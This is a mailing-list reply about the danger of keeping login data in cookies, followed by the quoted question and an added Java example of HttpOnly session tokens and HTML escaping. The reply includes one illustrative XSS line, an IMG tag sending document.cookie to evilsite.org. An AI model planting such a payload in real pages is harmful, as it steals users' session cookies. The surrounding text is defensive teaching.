Using cookies for security can be quite dangerous, as JavaScript
subverts the protection you were likely expecting. In particular,
if it's possible for users to put content anywhere on your site,
they can have the contents of the cookie sent to them:

     <IMG SRC = "http://evilsite.org/cookieReader?" + Document.cookie>

If users cannot post any content to your site, they can't do this--but
since it's subtle, and there are often inadvertent ways to post
content (an improperly written guest book) it's dangerous.

Justin

WebMacro Servlet Framework
http://webmacro.org


Quoting Pasquale Lambardi ([EMAIL PROTECTED]):
> Hi,
> I need help about the following problem:
> I used the cookies to manage a protected web site, then a cookie stores the status of a user,
> i.e. login and password.
> I used Apache Web Server and Apache Jserv as a Servlet engine.
> Under Netscape 4.6 it's ok.
> Under IE 5, it's ok only from my computer (i.e. local place), but it isn't ok from a remote site.
>
> Thanks to All,
> Pasquale
>
> ===========================================================================
> To unsubscribe, send email to [EMAIL PROTECTED] and include in the body
> of the message "signoff JSP-INTEREST".  For general help, send email to
> [EMAIL PROTECTED] and include in the body of the message "help".
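
An added example, not part of the original thread: it shows the defensive side of the reply above by keeping only an opaque random session token in the cookie (never the login and password), marking it HttpOnly so page script cannot read it, and HTML-encoding user-posted text such as guest-book entries. The class and method names are hypothetical, the sample values are constructed, and it uses only the JDK rather than the servlet API.

```java
import java.security.SecureRandom;
import java.util.Base64;
import java.util.Map;
import java.util.concurrent.ConcurrentHashMap;

// Added example: SessionCookies, issue, lookup and escapeHtml are hypothetical names.
public class SessionCookies {
    private static final SecureRandom RNG = new SecureRandom();
    // Server-side table: opaque token -> user name. The password never leaves the server.
    private final Map<String, String> sessions = new ConcurrentHashMap<>();

    // Call after a successful login; returns the Set-Cookie header value.
    public String issue(String user) {
        byte[] raw = new byte[32];
        RNG.nextBytes(raw);
        String token = Base64.getUrlEncoder().withoutPadding().encodeToString(raw);
        sessions.put(token, user);
        // HttpOnly hides the cookie from document.cookie; Secure keeps it off plain HTTP.
        return "SESSION=" + token + "; Path=/; HttpOnly; Secure; SameSite=Lax";
    }

    // Resolve a token taken from the Cookie header; unknown or missing tokens yield null.
    public String lookup(String token) {
        return token == null ? null : sessions.get(token);
    }

    // Encode user-posted text so the browser renders it as text, not markup.
    public static String escapeHtml(String s) {
        StringBuilder out = new StringBuilder(s.length() + 16);
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            switch (c) {
                case '&': out.append("&amp;"); break;
                case '<': out.append("&lt;"); break;
                case '>': out.append("&gt;"); break;
                case '"': out.append("&quot;"); break;
                case '\'': out.append("&#39;"); break;
                default: out.append(c);
            }
        }
        return out.toString();
    }

    public static void main(String[] args) {
        SessionCookies store = new SessionCookies();
        String header = store.issue("alice"); // constructed sample user
        String token = header.substring("SESSION=".length(), header.indexOf(';'));
        System.out.println("Set-Cookie: " + header);
        System.out.println("user = " + store.lookup(token));
        // Constructed sample guest-book entry containing markup.
        System.out.println(escapeHtml("<img src=\"x\"> Tom & Jerry's"));
    }
}
```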
